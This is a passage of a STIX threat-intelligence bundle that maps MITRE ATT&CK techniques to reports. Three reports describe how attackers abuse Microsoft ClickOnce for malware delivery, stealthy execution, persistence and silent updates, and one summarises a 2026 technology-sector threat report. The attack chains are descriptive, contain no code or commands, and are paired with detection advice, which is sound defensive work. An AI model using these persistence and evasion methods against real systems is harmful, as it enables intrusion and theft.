      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Signed Binary Proxy Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1218",
          "url": "https://attack.mitre.org/techniques/T1218"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--52c0c027-78f7-5512-b911-3b8437cb971c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--66f7d3f0-c981-540b-8493-ab359d8d0c58",
      "target_ref": "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9ac0e450-abf9-57dc-9c8c-e5e062ce380b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--66f7d3f0-c981-540b-8493-ab359d8d0c58",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3648fae3-5597-5cb8-bf1c-2340b67e3cef",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Non-Standard Port",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1571",
          "url": "https://attack.mitre.org/techniques/T1571"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--0b5abf7b-b799-5054-a916-8e43bd6f2794",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--66f7d3f0-c981-540b-8493-ab359d8d0c58",
      "target_ref": "attack-pattern--3648fae3-5597-5cb8-bf1c-2340b67e3cef"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--66f7d3f0-c981-540b-8493-ab359d8d0c58",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Threat Actors Abuse Microsoft ClickOnce Update Mechanism for Persistent Malware Delivery",
      "description": "## Overview\n\nThreat actors are increasingly abusing Microsoft's ClickOnce deployment technology, particularly focusing on its update mechanism, to establish persistent malware presence and evade detection. This technique, highlighted by CrowdStrike in June 2026, leverages the user-friendly installation and built-in updating features of ClickOnce to bypass traditional defenses. Attackers lure users into installing seemingly harmless ClickOnce applications, which drop `.appref-ms` shortcut files in the Start Menu. Subsequently, the threat actors can push malicious updates to these applications from their controlled deployment servers. This allows for silent malware updates, C2 address changes, and lateral movement capabilities, all while operating within legitimate Microsoft processes like `dfsvc.exe` and `rundll32.exe`. This abuse takes advantage of a general lack of awareness around ClickOnce security, providing a stealthy and persistent vector on enterprise endpoints.\n\n## Attack Chain\n\n1.  **Initial Access via Social Engineering:** The attacker convinces a target user, often through phishing emails or malicious websites, to click a link or button that initiates a ClickOnce application download.\n2.  **Malicious ClickOnce Application Deployment:** The user's interaction triggers the download and execution of a malicious `.application` file, initiating the ClickOnce deployment process.\n3.  **Execution via Legitimate Processes:** The malicious payload executes within legitimate Microsoft process trees, specifically utilizing `dfsvc.exe` (ClickOnce Deployment Support Service) and `rundll32.exe` to launch the initial malicious components.\n4.  **Persistence through `.appref-ms` File:** If the application is configured for offline availability, a shortcut file (`.appref-ms`) is dropped into the user's Start Menu (`%Users\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\`).\n5.  **Malicious Update Delivery:** When the user subsequently launches the application via the `.appref-ms` shortcut, the ClickOnce client checks for updates from the attacker-controlled server.\n6.  **Silent Payload Update and Re-execution:** The attacker pushes a malicious update to the deployment server, which is then downloaded and executed by the `dfsvc.exe` process without requiring user re-authorization or prompting.\n7.  **Impact (Remote Access/Lateral Movement):** The updated malicious payload can then establish remote access, modify C2 addresses, facilitate lateral movement, or perform other malicious actions on the compromised system.\n\n## Impact\n\nThe successful exploitation of ClickOnce's update mechanism allows threat actors to maintain persistent access to targeted systems with high stealth. Because the initial application deployment does not require administrative privileges, standard user accounts, which comprise the majority of enterprise endpoints, are vulnerable. Once established, attackers can silently update their malware, enabling them to alter C2 infrastructure, facilitate lateral movement within a network, and exfiltrate sensitive data. This technique bypasses common email gateway protections and traditional file-based scrutiny, leading to extended dwell times and increased potential for significant data breaches or system compromise.\n\n## Recommendation\n\n*   **Implement a robust Endpoint Detection and Response (EDR) solution:** Deploy EDR capabilities to detect suspicious process creation and network connections from `dfsvc.exe` and `rundll32.exe` as detailed in the Sigma rules below.\n*   **Deploy the Sigma rules in this brief to your SIEM/EDR:** Tune the provided rules to detect `dfsvc.exe` spawning unusual child processes or making suspicious network connections, and `rundll32.exe` executing with abnormal parameters.\n*   **Monitor `process_creation` events:** Specifically watch for instances where `dfsvc.exe` or `rundll32.exe` act as parent processes for scripting interpreters (e.g., powershell.exe, cmd.exe) or other unusual executables.\n*   **Monitor `network_connection` events:** Focus on outbound connections initiated by `dfsvc.exe` to non-standard ports or suspicious external IP addresses/domains.\n*   **Educate users on ClickOnce risks:** Increase awareness about the nature of `.application` files and the potential risks of installing software from untrusted sources, even if the installation appears to be legitimate.\n",
      "published": "2026-06-21T05:21:58Z",
      "labels": [
        "clickonce",
        "persistence",
        "defense-evasion",
        "windows",
        "malware",
        "social-engineering"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--2738ae9d-0b9b-504f-83cc-489247954b8f",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--3648fae3-5597-5cb8-bf1c-2340b67e3cef"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e60132ef-d288-5281-95bf-34fb5be01e7f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a40f2350-0ea3-5cb8-9194-36f2af7dfc33",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e7c33bac-7221-5098-981e-26f35b6afc0e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a40f2350-0ea3-5cb8-9194-36f2af7dfc33",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a40f2350-0ea3-5cb8-9194-36f2af7dfc33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse of Microsoft ClickOnce Technology for Malware Deployment",
      "description": "## Overview\n\nMicrosoft's ClickOnce technology, intended to streamline application distribution and updates, is being increasingly abused by threat actors to deploy malicious software. ClickOnce facilitates the deployment of applications with minimal user interaction and often without requiring administrative privileges, making it an ideal vector for malware. This allows adversaries to package and distribute their payloads in a user-friendly format, potentially bypassing traditional security controls. While Part 1 of this research focuses on the internal workings of ClickOnce, it highlights features such as self-contained packaging and self-updating functionality which, if weaponized, could enable persistent and evasive malware campaigns. This abuse poses a significant risk to organizations, as it simplifies the initial access and execution phases for attackers by leveraging a legitimate Microsoft deployment mechanism.\n\n## Attack Chain\n\n1.  Threat actor packages a malicious application using Microsoft's ClickOnce publishing tools in Visual Studio.\n2.  The actor hosts the generated ClickOnce deployment files (e.g., `.application` manifest, executable, `.deploy` files) on a remote web server or network share.\n3.  The attacker creates a malicious link, often embedded in a phishing email or hosted on a compromised website, to trigger the download and deployment of the ClickOnce application.\n4.  A user clicks the malicious link, which initiates the download of the `.application` deployment manifest.\n5.  The Windows operating system's ClickOnce deployment service (`dfsvc.exe`) processes the manifest and, if the publisher's signature is not verified, prompts the user for confirmation.\n6.  Upon user confirmation, `dfsvc.exe` downloads and executes the packaged malicious application.\n7.  The malicious application runs with the user's privileges, potentially performing actions such as data exfiltration or installing additional malware.\n8.  If configured for installation, the malicious ClickOnce application might establish persistence (e.g., via startup entries) and use ClickOnce's self-updating feature for dynamic command and control.\n\n## Impact\n\nThe abuse of ClickOnce technology allows attackers to easily distribute malware, potentially leading to widespread infections. Because ClickOnce applications often run without requiring administrative privileges, they can bypass security measures that rely on privilege escalation detection. Successful exploitation can result in unauthorized access, data theft, further system compromise, and the deployment of ransomware or other destructive payloads. The self-updating nature of ClickOnce applications means that initially deployed malware can evolve, receive new capabilities, or evade detection over time, making long-term compromise more likely.\n\n## Recommendation\n\n*   Deploy the Sigma rule \"Detect ClickOnce Deployment Service Launching Applications\" to monitor `dfsvc.exe` activity for suspicious application launches.\n*   Implement the Sigma rule \"Detect Download of Suspicious ClickOnce Deployment Files\" to identify `.application` or `.manifest` files downloaded from unusual sources.\n*   Use the Sigma rule \"Detect ClickOnce Application Execution from Suspicious Paths\" to flag executions of ClickOnce apps from temporary or user-controlled directories.\n*   Educate users on the risks associated with installing unsigned or untrusted applications via ClickOnce prompts.\n*   Enable comprehensive process creation logging for `dfsvc.exe` to capture command-line arguments and parent-child process relationships.\n",
      "published": "2026-06-20T15:38:30Z",
      "labels": [
        "clickonce",
        "deployment",
        "windows",
        "malware-distribution",
        "application-deployment"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-one/"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Brute Force",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1110",
          "url": "https://attack.mitre.org/techniques/T1110"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--455523e7-1de5-5b13-83b3-a0211fa487d4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6039d3f8-5405-5425-b33a-884d3aa005fb",
      "target_ref": "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--76c6a59c-835d-5d45-a2ea-f2d9b65819c7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6039d3f8-5405-5425-b33a-884d3aa005fb",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Supply Chain Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1195",
          "url": "https://attack.mitre.org/techniques/T1195"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fc558b0f-2962-5e8c-ab35-0e7c947c682f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6039d3f8-5405-5425-b33a-884d3aa005fb",
      "target_ref": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9e34c523-c1b2-5101-b59d-9b9774c7e990",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6039d3f8-5405-5425-b33a-884d3aa005fb",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cf094c3e-4d80-5b6d-b2a3-2d3f12ca1d34",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6039d3f8-5405-5425-b33a-884d3aa005fb",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91df9bf6-3601-547b-a8fc-7e43dedb9c68",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--6039d3f8-5405-5425-b33a-884d3aa005fb",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--6039d3f8-5405-5425-b33a-884d3aa005fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CrowdStrike 2026 Technology Threat Landscape Report: China's Ambitions Fuel Attacks",
      "description": "## Overview\n\nThe CrowdStrike 2026 Technology Threat Landscape Report reveals the technology sector as the primary target for both state-sponsored and eCrime adversaries during the period of April 1, 2025, to March 31, 2026. China-nexus groups, including MURKY PANDA, MUSTANG PANDA, OVERCAST PANDA, SUNRISE PANDA, and WARP PANDA, accounted for over 58% of state-sponsored intrusions, driven by goals of intelligence collection, intellectual property theft, and supply chain compromise. These actors utilized methods such as password spraying and exploiting vulnerabilities. DPRK-nexus groups like FAMOUS CHOLLIMA and STARDUST CHOLLIMA targeted the sector for financial gain through fraudulent employment schemes and supply chain compromises, notably the Axios npm package. eCrime adversaries conducted 65% of hands-on-keyboard operations, focusing on extortion, leveraging initial access brokers, distributing malware via lures (e.g., fake OpenClaw skills for macOS info stealers), and injecting malicious code into platforms like GitHub repositories.\n\n## Attack Chain\n\n1.  **Initial Access**: Adversaries gain initial entry through various means, including password spraying attacks (observed with MURKY PANDA), exploitation of public-facing vulnerabilities in applications or infrastructure (WARP PANDA), or by luring victims with social engineering tactics (e.g., fake OpenClaw skills distributing macOS info stealers).\n2.  **Execution \u0026 Persistence**: Upon successful compromise or user interaction, malware (such as the macOS information stealer) is executed. Attackers then establish and maintain persistent access within the targeted environment, often through methods not explicitly detailed in the report.\n3.  **Lateral Movement \u0026 Credential Access**: Threat actors move deeper into the network, frequently leveraging stolen credentials or exploiting internal weaknesses, to reach critical systems and high-value data.\n4.  **Data Collection**: Adversaries identify and gather sensitive information, including intellectual property, source code from private repositories (as seen with Crimson Collective's activities), and other data aligned with intelligence collection objectives.\n5.  **Supply Chain Compromise**: In some instances, attackers inject malicious code into widely used software components (e.g., STARDUST CHOLLIMA compromising the Axios npm package) or directly into public code repositories (e.g., the Glassworm actor compromising GitHub repositories).\n6.  **Data Exfiltration**: The collected intellectual property, sensitive data, or compromised code is then transferred out of the victim's network to adversary-controlled infrastructure.\n7.  **Impact \u0026 Extortion**: The ultimate objectives include intelligence collection, intellectual property theft, and financial gain. eCrime adversaries frequently resort to extortion, often by listing organizations on dedicated leak sites (572 tech organizations observed).\n\n## Impact\n\nThe technology sector faces severe consequences from these attacks, encompassing significant intelligence collection losses, intellectual property theft, and financial damage. State-sponsored actors, particularly China-nexus groups, aim to steal cutting-edge innovations and AI capabilities, hindering competitive advantage. eCrime groups extensively use extortion, naming 572 technology organizations on leak sites, vastly exceeding other sectors. Supply chain compromises, such as the STARDUST CHOLLIMA compromise of the Axios npm package, can expose millions of downstream users and poison open-source ecosystems, leading to widespread collateral damage and erosion of trust in software components. DPRK-nexus activities also contribute to financial losses through fraudulent employment schemes.\n\n## Recommendation\n\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect macOS information stealers and suspicious application activity.\n*   Implement strong multi-factor authentication (MFA) and monitor authentication logs for password spraying attempts, referencing the threat from MURKY PANDA.\n*   Monitor process creation and network connections on macOS endpoints to detect suspicious activity indicative of the macOS information stealer distributed via \"OpenClaw-related lures\".\n*   Scrutinize software supply chain integrity, including regular audits of `npm` package dependencies and GitHub repository activity, to mitigate risks highlighted by the STARDUST CHOLLIMA and Glassworm compromises.\n",
      "published": "2026-06-19T05:22:20Z",
      "labels": [
        "intelligence-collection",
        "espionage",
        "supply-chain-compromise",
        "software-supply-chain",
        "extortion",
        "state-sponsored",
        "ecrime",
        "macos",
        "github"
      ],
      "object_refs": [
        "attack-pattern--df700e48-7d2c-59e3-b11f-85d870ac4a51",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/crowdstrike-2026-technology-threat-landscape-report/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Phishing",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1566",
          "url": "https://attack.mitre.org/techniques/T1566"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3a993b0f-f499-5312-b4ab-21ca39b328f7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a8a2a938-ad45-511d-b51e-6a6a277cd809",
      "target_ref": "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8af9a4f4-54b6-5663-8d84-c390001f639b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a8a2a938-ad45-511d-b51e-6a6a277cd809",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Boot or Logon Autostart Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1547",
          "url": "https://attack.mitre.org/techniques/T1547"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e28ab749-e9b3-55c2-8416-fbdb1f92a812",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a8a2a938-ad45-511d-b51e-6a6a277cd809",
      "target_ref": "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Masquerading",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1036",
          "url": "https://attack.mitre.org/techniques/T1036"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--24b53a9f-10c3-54be-a002-229e544f7eb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a8a2a938-ad45-511d-b51e-6a6a277cd809",
      "target_ref": "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b6144ec8-36dd-5df2-ab25-5c48d49efc8a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a8a2a938-ad45-511d-b51e-6a6a277cd809",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a8a2a938-ad45-511d-b51e-6a6a277cd809",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Threat Actors Weaponize Microsoft ClickOnce for Persistent Malware Delivery and Evasion",
      "description": "## Overview\n\nThreat actors are increasingly abusing Microsoft's ClickOnce application deployment technology to deliver malicious payloads, as highlighted by CrowdStrike. This technique allows adversaries to simplify the delivery phase of the kill chain by requiring minimal user interaction for execution and deployment. ClickOnce applications, often deployed via `.application` files, can fly under the radar of security tools that typically scrutinize `.exe` files, exploiting a general lack of awareness among users and security teams. A significant advantage for attackers is that ClickOnce applications do not require administrator privileges for installation, lowering the barrier for compromise. Furthermore, the technology offers a built-in updating mechanism, allowing attackers to maintain remote access and update their malware stealthily by pushing malicious updates to compromised deployment servers or to initially benign applications. This method uses legitimate Microsoft processes (`rundll32.exe`, `dfsvc.exe`), increasing execution stealth.\n\n## Attack Chain\n\n1.  **Initial Access**: An attacker convinces a user to click a malicious link or open a malicious `.application` file, often through social engineering.\n2.  **Execution (Initial Deployment)**: The user's click initiates the ClickOnce application deployment process, executing the attacker-controlled application without requiring administrator privileges.\n3.  **Persistence (Shortcut Creation)**: If configured for offline availability, the ClickOnce application drops an `.appref-ms` shortcut file into the user's Start Menu (`%Users\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\`) for easy re-launch.\n4.  **Defense Evasion / Execution**: The malicious payload executes within legitimate Microsoft process trees, specifically `rundll32.exe` and `dfsvc.exe`, making it harder to detect as malicious activity.\n5.  **Command and Control (Update Mechanism)**: The attacker compromises a legitimate ClickOnce application server or controls their own, enabling them to push malicious updates.\n6.  **Persistence (Re-engagement/Update)**: When the user subsequently launches the application via its `.appref-ms` shortcut, the ClickOnce components fetch updates from the attacker-controlled server.\n7.  **Execution (Updated Payload)**: The malicious update is downloaded and executed without further user prompts, enabling the attacker to change C2 addresses, move laterally, or perform other malicious actions.\n8.  **Impact**: The attacker achieves persistent remote access, potentially leading to data exfiltration, further compromise, or deployment of additional malware.\n\n## Impact\n\nThe abuse of ClickOnce technology can lead to persistent remote access for threat actors, enabling them to bypass traditional endpoint security controls by leveraging legitimate system processes and user-friendly deployment mechanisms. Victims typically experience a compromise that can escalate to data exfiltration, lateral movement within the network, or the deployment of ransomware or other destructive payloads. The lack of administrator privilege requirements means that successful exploitation can affect a wide range of user accounts, increasing the attack surface within an organization. The stealthy update mechanism ensures that even initially benign applications can be weaponized later, making detection and remediation challenging.\n\n## Recommendation\n\n*   Enable comprehensive `process_creation` logging for `dfsvc.exe` and `rundll32.exe` to detect unusual parent processes or command-line arguments, as identified in the Sigma rules.\n*   Implement `file_event` logging for the creation of `.appref-ms` files, specifically within `%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\`, as detected by the `Detect ClickOnce Appref-ms Persistence` rule.\n*   Deploy the provided Sigma rules to your SIEM/EDR platform and tune them for your environment, paying close attention to processes originating from untrusted locations.\n*   Educate users about the risks associated with installing software from untrusted sources, even those that appear to be legitimate applications.\n",
      "published": "2026-06-19T06:23:55Z",
      "labels": [
        "clickonce",
        "persistence",
        "defense_evasion",
        "malware_delivery",
        "windows"
      ],
      "object_refs": [
        "attack-pattern--3dd3accc-f54c-5fb7-acd3-17fd9651741c",
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
        "attack-pattern--d1ec9446-7c7c-5d3e-a3f5-88355568dcdf",
        "attack-pattern--fef861e9-3ac4-50b1-aa1a-3ff772ca094e",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://www.crowdstrike.com/en-us/blog/new-abuse-of-the-clickonce-technology-part-two/"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--013217b6-43ef-5c2f-bc17-bdc324597efd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2ce48c8e-7344-5fdf-9b84-f27bdbd6584e",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--47ea8790-e013-5485-a535-b2eefc82f19f",
      "created": "2026-07-09T17:20:22Z",
